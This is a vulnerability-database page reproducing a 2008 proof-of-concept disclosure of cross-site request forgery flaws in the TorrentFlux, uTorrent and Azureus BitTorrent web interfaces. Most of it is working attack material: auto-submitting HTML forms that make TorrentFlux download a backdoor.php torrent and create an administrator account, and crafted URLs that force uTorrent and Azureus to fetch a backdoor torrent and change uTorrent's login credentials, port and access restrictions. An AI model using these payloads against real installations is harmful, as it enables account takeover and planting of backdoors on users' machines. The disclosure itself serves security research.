Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:19699
HistoryApr 20, 2008 - 12:00 a.m.

BitTorrent Clients and CSRF

2008-04-2000:00:00
vulners.com
19
JSON

The following are proof of concept exploits against three bittorrent clients. uTorrent' WebUI, Azurues's "HTML WebUI",
and TorrentFlux.

More information:
http://www.rooksecurity.com/blog/?p=10

TorrentFlux v2.3(Latest)
http://sourceforge.net/projects/torrentflux/

If you force TorrentFlux to download a torrent that contains a file backdoor.php you will be able to execute it by
browsing here:
http://localhost/torrentflux_2.3/html/downloads/USER_NAME/
You do not have to know a password to access this folder, but you will have to know the username.
<html>
<form id='file_attack' method="post" action="http://localhost/torrentflux_2.3/html/index.php&quot;&gt;
<input type=hidden name="url_upload" value="http://localhost/backdoor.php.torrent&quot;&gt;
<input type=submit value='file attack'>
</from>
<html>
<script>
document.getElementById('file_attack').submit();
</script>

<html>
Add an admistrative account:
<form id=’create_admin’ method=”post” action=”http://localhost/torrentflux_2.3/html/admin.php?op=addUser”&gt;
<input type=hidden name=”newUser” value=”sadmin”>
<input type=hidden name=”pass1″ value=”password”>
<input type=hidden name=”pass2″ value=”password”>
<input type=hidden name=”userType” value=1>
<input type=submit value=’create admin’>
</form>
</html>
<script>
document.getElementById(’create_admin’).submit();
</script>

uTorrent’s WebUI is also affected:
http://forum.utorrent.com/viewtopic.php?id=14565
force file download:
http://127.0.0.1:8080/gui/?action=add-url&amp;s=http://localhost/backdoor.torrent

utorrent change administrative login information:
http://127.0.0.1:8080/gui/?action=setsetting&amp;s=webui.username&amp;v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&amp;s=webui.password&amp;v=badmin
http://127.0.0.1:8080/gui/?action=setsetting&amp;s=webui.port&amp;v=4096
After the username or password have been changed then the browser must re-authenticate.
http://127.0.0.1:8080/gui/?action=setsetting&amp;s=webui.restrict&amp;v=127.0.0.1/24,10.1.1.1
So is Azurues’s HTML WebUI:
Force file download:
http://127.0.0.1:6886/index.tmpl?d=u&amp;upurl=http://localhost/backdoor.torrent

JSON